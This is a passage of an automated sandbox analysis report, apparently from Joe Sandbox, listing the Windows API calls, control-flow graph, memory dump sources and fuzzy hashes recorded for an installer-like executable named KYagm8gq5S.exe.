                                  • DeleteFileW.KERNELBASE(?,?,?,00000000,00405DFA), ref: 00405C3B
                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C53
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: File$Attributes$DeleteDirectoryRemove
                                  • String ID:
                                  • API String ID: 1655745494-0
                                  • Opcode ID: db7f6541ced3958ca03b9484ad33d053af3f68eb31512009fba6ce163230055c
                                  • Instruction ID: f682af0fc63b023cf24323d230711a29b923368031e02a534c45a89517f952f8
                                  • Opcode Fuzzy Hash: db7f6541ced3958ca03b9484ad33d053af3f68eb31512009fba6ce163230055c
                                  • Instruction Fuzzy Hash: E9E0653110D75156E32067755E0CB5B2AD9DF86324F05093AF592B21D0CB78488A8AAD

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 657 401389-40138e 658 4013fa-4013fc 657->658 659 401390-4013a0 658->659 660 4013fe 658->660 659->660 662 4013a2-4013a3 call 401434 659->662 661 401400-401401 660->661 664 4013a8-4013ad 662->664 665 401404-401409 664->665 666 4013af-4013b7 call 40136d 664->666 665->661 669 4013b9-4013bb 666->669 670 4013bd-4013c2 666->670 671 4013c4-4013c9 669->671 670->671 671->658 672 4013cb-4013f4 MulDiv SendMessageW 671->672 672->658
                                  APIs
                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                  • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID:
                                  • API String ID: 3850602802-0
                                  • Opcode ID: 2a9df91d450fb50793c14fb38bc67898e6fb514a90870fda1bdd56b9451edd81
                                  • Instruction ID: cd791cecd07b1aef7d4b508d0a52a2ac0ec5e235a68ccce80931b69816989e44
                                  • Opcode Fuzzy Hash: 2a9df91d450fb50793c14fb38bc67898e6fb514a90870fda1bdd56b9451edd81
                                  • Instruction Fuzzy Hash: 6301F4326242109BE7195B389D05B6B36A8F791314F10863FF955F62F1DA78CC42DB4D
                                  APIs
                                  • CreateDirectoryW.KERNELBASE(007AB800,?), ref: 00405AEA
                                  • GetLastError.KERNEL32 ref: 00405AF8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: CreateDirectoryErrorLast
                                  • String ID:
                                  • API String ID: 1375471231-0
                                  • Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                  • Instruction ID: 13352011552d0ddc4b0c1568d720dcd5f2ba617a9a750a7f60e40e4c0ab4bb23
                                  • Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                  • Instruction Fuzzy Hash: 52F0F4B0D0060EDADB00CFA4C6487EFBBB4AB04309F10812AD941B6281D7B882488FA9
                                  APIs
                                  • CreateProcessW.KERNELBASE(00000000,007AB800,00000000,00000000,00000000,04000000,00000000,00000000,007A4750,?,?,?,007AB800,?), ref: 00405B60
                                  • CloseHandle.KERNEL32(?,?,?,007AB800,?), ref: 00405B6D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: CloseCreateHandleProcess
                                  • String ID:
                                  • API String ID: 3712363035-0
                                  • Opcode ID: 1cf2fe051d34b4090bca479d50b9d9e6ed2e29e2a91626cbf83b173b154ad348
                                  • Instruction ID: e42c3092a0fd4a031c4fd4b3b8927d6f3122727aa63034fdce6a98e2e8d9435a
                                  • Opcode Fuzzy Hash: 1cf2fe051d34b4090bca479d50b9d9e6ed2e29e2a91626cbf83b173b154ad348
                                  • Instruction Fuzzy Hash: ECE09AB4900249BFEB109F64AD05E7B776CE745644F008525BD10F6151D775A8148A79
                                  APIs
                                  • GetModuleHandleA.KERNEL32(?,00000020,?,0040363F,0000000C,?,?,?,?,?,?,?,?), ref: 0040695A
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406975
                                    • Part of subcall function 004068D8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068EF
                                    • Part of subcall function 004068D8: wsprintfW.USER32 ref: 0040692A
                                    • Part of subcall function 004068D8: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040693E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                  • String ID:
                                  • API String ID: 2547128583-0
                                  • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                  • Instruction ID: 551f93d59f6a57a7cc32b559d7ebc8a6d8da67cd5dc02587d5b4d2bd1ffdf244
                                  • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                  • Instruction Fuzzy Hash: 95E08673504310AAD2105A705E04C2B73B89F85740302443EF942F2140D734DC32E769
                                  APIs
                                  • GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\Desktop\KYagm8gq5S.exe,80000000,00000003), ref: 00406048
                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: File$AttributesCreate
                                  • String ID:
                                  • API String ID: 415043291-0
                                  • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                  • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                  • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                  • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                  APIs
                                  • GetFileAttributesW.KERNELBASE(?,?,00405C24,?,?,00000000,00405DFA,?,?,?,?), ref: 00406024
                                  • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406038
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                  • Instruction ID: d82061c04a2b8cfefef23152450b12cfa0b89b98e7d36fec1851b0ef0e6873e8
                                  • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                  • Instruction Fuzzy Hash: 96D0C972505220AFC6103728EE0889BBB55DB542B1B028B36F8A9A22B0CB304C668694
                                  APIs
                                  • CloseHandle.KERNEL32(FFFFFFFF,00403A7F,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403B57
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\, xrefs: 00403B6B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: CloseHandle
                                  • String ID: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\
                                  • API String ID: 2962429428-652483267
                                  • Opcode ID: 75b6059274c34f4acd1c30ca659bcafdfbceb07ace89e443466d463c647567ff
                                  • Instruction ID: a1f1ac0e1dc9f784418d88d53cf8a45e589aa6af5dd6b663cfe1e6d9b7eec15f
                                  • Opcode Fuzzy Hash: 75b6059274c34f4acd1c30ca659bcafdfbceb07ace89e443466d463c647567ff
                                  • Instruction Fuzzy Hash: CBC0123090470996E5207F7D9D8FE453A24574033DB948325B1B9B00F3C73C5659555D
                                  APIs
                                  • CreateDirectoryW.KERNELBASE(?,00000000,00403522,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00405B08
                                  • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B16
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: CreateDirectoryErrorLast
                                  • String ID:
                                  • API String ID: 1375471231-0
                                  • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                  • Instruction ID: 7bb2d1eb449126eed485e4eb4fbdbafbf981390ed288ef949080c13de55397a1
                                  • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                  • Instruction Fuzzy Hash: 7CC08C30314902DADA802B209F0870B3A60AB80340F154439A582E00E4CA30A445C92D
                                  APIs
                                  • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E7C,00000000,?,?), ref: 00406418
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                  • Instruction ID: 1ec48b264e911f442ad562827ea2aeba8bdc9c692846981259ff7ce92a87d17c
                                  • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                  • Instruction Fuzzy Hash: 60E0BF72110109BFEF095F90DD0AD7B761DE704210B01452EF906D4051E6B5A9305674
                                  APIs
                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E4,00000000,00000000,0040332B,000000FF,00000004,00000000,00000000,00000000), ref: 004060DB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                  • Instruction ID: 1a6ac9c2f17c3bf7024e7b579d6ce6ab3b84958f313ea5b4b1ce89539a84cc3a
                                  • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                  • Instruction Fuzzy Hash: 55E0EC3225026AABDF10DE55DC00EEB7BACEB053A0F018437F956E7150DA31E93197A8
                                  APIs
                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040349A,00000000,00793700,000000FF,00793700,000000FF,000000FF,00000004,00000000), ref: 0040610A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: FileWrite
                                  • String ID:
                                  • API String ID: 3934441357-0
                                  • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                  • Instruction ID: 280cd4c212b49affc14266408846aa3a30e7e9a640caac8a44b81d30c287abca
                                  • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                  • Instruction Fuzzy Hash: E1E08C3221025AABCF109E908C01EEB7B6CEB043A0F014433FD16EB051D230E8319BA8
                                  APIs
                                  • MoveFileExW.KERNELBASE(?,?,00000005,00405E12,?,00000000,000000F1,?,?,?,?,?), ref: 0040631E
                                    • Part of subcall function 0040619A: CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406335,?,?), ref: 004061D5
                                    • Part of subcall function 0040619A: GetShortPathNameW.KERNEL32(?,007A4DE8,00000400), ref: 004061DE
                                    • Part of subcall function 0040619A: GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 004061FB
                                    • Part of subcall function 0040619A: wsprintfA.USER32 ref: 00406219
                                    • Part of subcall function 0040619A: GetFileSize.KERNEL32(00000000,00000000,007A55E8,C0000000,00000004,007A55E8,?,?,?,?,?), ref: 00406254
                                    • Part of subcall function 0040619A: GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406263
                                    • Part of subcall function 0040619A: lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629B
                                    • Part of subcall function 0040619A: SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A49E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: File$NamePathShort$AllocCloseGlobalHandleMovePointerSizelstrcpywsprintf
                                  • String ID:
                                  • API String ID: 1930046112-0
                                  • Opcode ID: 1e4010844bb8ba65faee9067da085bc24f8460d998ee42ad1bb04f80e0c5d623
                                  • Instruction ID: 61133f9cef57a20764965838461fa3ce05e158346d16c5387ed6595a8127f79a
                                  • Opcode Fuzzy Hash: 1e4010844bb8ba65faee9067da085bc24f8460d998ee42ad1bb04f80e0c5d623
                                  • Instruction Fuzzy Hash: 38D09E32148601AEDA411B50DD05A5B7BA1BF94355F11C42EF585540B1DB358461DF09
                                  APIs
                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403267,?), ref: 004034F5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: FilePointer
                                  • String ID:
                                  • API String ID: 973152223-0
                                  • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                  • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                  • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                  • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                  APIs
                                    • Part of subcall function 004055D9: lstrlenW.KERNEL32(007A0728,00000000,00798B00,74DF23A0,?,?,?,?,?,?,?,?,?,0040341A,00000000,?), ref: 00405611
                                    • Part of subcall function 004055D9: lstrlenW.KERNEL32(0040341A,007A0728,00000000,00798B00,74DF23A0,?,?,?,?,?,?,?,?,?,0040341A,00000000), ref: 00405621
                                    • Part of subcall function 004055D9: lstrcatW.KERNEL32(007A0728,0040341A,0040341A,007A0728,00000000,00798B00,74DF23A0), ref: 00405634
                                    • Part of subcall function 004055D9: SetWindowTextW.USER32(007A0728,007A0728), ref: 00405646
                                    • Part of subcall function 004055D9: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566C
                                    • Part of subcall function 004055D9: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405686
                                    • Part of subcall function 004055D9: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405694
